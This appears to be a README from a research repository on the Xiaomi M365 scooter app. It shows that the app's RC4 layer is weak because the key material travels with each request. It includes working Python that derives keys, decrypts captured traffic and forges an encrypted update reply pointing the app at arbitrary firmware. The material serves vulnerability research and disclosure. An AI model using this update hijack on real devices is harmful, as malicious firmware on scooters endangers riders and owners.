This repository contains multiple files from the investigation of the Xiaomi Mijia M365 scooter.
Table of Contents
This section contains the research into things such as the official apps and the Bluetooth communication protocol.
All requests the app makes to the servers about the scooter (checking for updates, etc.) are encrypted with RC4. In the latest Android version every parameter used to derive the key is sent along with each request, so anyone who can observe a request can also derive its key. A captured request looks like this:
data=zqnK2TlkGDq6iZToITYyt9CAEtoWht4LEh88XRnU&rc4_hash__=u8lit+iwOqc0P1k+VsRSlZ72POBvp701tEWFSg==&signature=A/l2lbo3OOdt/VoyEyLECfI/6BY=&_nonce=pFBJTd2vcbUBgaHP&ssecurity=Tw+X976Vymge9yBtgZPeMQ==
The parameters used to derive the key are "ssecurity" and "_nonce", combined as follows: B64Encode(Sha256(concat(B64Decode(ssecurity), B64Decode(_nonce))))
This key is then base64-decoded (leaving the raw 32-byte SHA-256 digest) and used with a standard RC4 algorithm, except that the first 1024 keystream bytes are discarded (1024 "fake rounds", i.e. RC4-drop[1024]). The following snippet is a Python implementation of this RC4 variant:
```python
def rc4mi(data: bytes, key: bytes) -> bytes:
    """RC4 with the first 1024 keystream bytes discarded (RC4-drop[1024]).
    data and key are raw bytes, i.e. already base64-decoded.
    Encryption and decryption are the same operation."""
    # Key-scheduling algorithm (KSA)
    S, j, out = list(range(256)), 0, bytearray()
    for i in range(256):
        j = (j + key[i % len(key)] + S[i]) % 256
        S[i], S[j] = S[j], S[i]
    # 1024 "fake rounds": run the PRGA but throw the keystream away
    i = j = 0
    for _ in range(1024):
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
    # Real PRGA: XOR every input byte with the next keystream byte
    for ch in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(ch ^ S[(S[i] + S[j]) % 256])
    return bytes(out)
```
When the app checks for upgrades it sends a request to the Xiaomi servers, specifically to the endpoint "/app/home/latest_version", with the following content (it differs slightly between Android and iOS, but that is not important):
{"model":"ninebot.scooter.v1"}
The server then responds with the data below. To push an update it is as simple as intercepting the server's response, filling in the parameters and encrypting the message with the ssecurity and _nonce of the request:
{"code":0,"message":"ok","result":{"version":"","url":"","changeLog":"","md5":""}}
- code: 0
- message: ok
- result:
  - version: anything you want, e.g. 1.0.1_237
  - url: URL to a zip file containing the firmware
  - changeLog: anything you want
  - md5: MD5 hash of the zip file
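The following is an added example (not code from the original research) that ties the two pieces together: it derives the key from the ssecurity and _nonce values of the captured request shown above, implements the RC4-drop[1024] layer, and builds an encrypted /app/home/latest_version reply that points the app at a firmware zip. The firmware URL, the zip contents and the function names are constructed for illustration only; the md5 field is computed from the placeholder bytes, not from real firmware.

```python
import base64
import hashlib
import json

# ssecurity and _nonce values taken from the captured request above.
SSECURITY = "Tw+X976Vymge9yBtgZPeMQ=="
NONCE = "pFBJTd2vcbUBgaHP"


def derive_key(ssecurity_b64: str, nonce_b64: str) -> bytes:
    """B64Encode(SHA256(B64Decode(ssecurity) || B64Decode(_nonce))) is
    base64-decoded again before use, which leaves the raw 32-byte digest."""
    material = base64.b64decode(ssecurity_b64) + base64.b64decode(nonce_b64)
    return hashlib.sha256(material).digest()


def rc4_drop1024(data: bytes, key: bytes) -> bytes:
    """RC4 whose first 1024 keystream bytes are discarded (the app's
    'fake rounds'). Encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key scheduling (KSA)
        j = (j + key[i % len(key)] + S[i]) % 256
        S[i], S[j] = S[j], S[i]
    i = j = 0
    out = bytearray()
    for n in range(1024 + len(data)):         # PRGA; first 1024 outputs dropped
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        if n >= 1024:
            out.append(data[n - 1024] ^ S[(S[i] + S[j]) % 256])
    return bytes(out)


def decrypt_response(data_b64: str, ssecurity_b64: str, nonce_b64: str) -> dict:
    """Strip the RC4 layer from a base64 'data' blob and parse the JSON inside."""
    key = derive_key(ssecurity_b64, nonce_b64)
    return json.loads(rc4_drop1024(base64.b64decode(data_b64), key).decode())


def forge_update_response(firmware_zip: bytes, url: str, version: str,
                          ssecurity_b64: str, nonce_b64: str) -> str:
    """Build a latest_version reply advertising our zip, encrypted with the key
    derived from the intercepted request's own ssecurity and _nonce so the app
    decrypts it exactly as it would the real server's answer."""
    body = {
        "code": 0,
        "message": "ok",
        "result": {
            "version": version,                       # anything you want
            "url": url,                               # where the app fetches the zip
            "changeLog": "custom firmware",           # anything you want
            "md5": hashlib.md5(firmware_zip).hexdigest(),
        },
    }
    plaintext = json.dumps(body, separators=(",", ":")).encode()
    key = derive_key(ssecurity_b64, nonce_b64)
    return base64.b64encode(rc4_drop1024(plaintext, key)).decode()


if __name__ == "__main__":
    # Constructed placeholder; a real zip would be the firmware package itself.
    fake_zip = b"PK\x03\x04 constructed placeholder, not real firmware"
    data = forge_update_response(fake_zip, "http://192.0.2.10/firmware.zip",
                                 "1.0.1_237", SSECURITY, NONCE)
    print("data=" + data)
    print(decrypt_response(data, SSECURITY, NONCE))
```

Note that the key material (ssecurity and _nonce) is carried in the very request that the reply answers, so this RC4 layer offers no protection against anyone positioned to read or modify the traffic; decrypt_response works on a captured "data" blob for the same reason forge_update_response works on the reply.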
This project is licensed under the MIT License - see the LICENSE.md file for details
- Hector Cuesta H3ku
- Jesus Anton Patatas Fritas
- Borja Martinez Borjmz
- Jaime Martin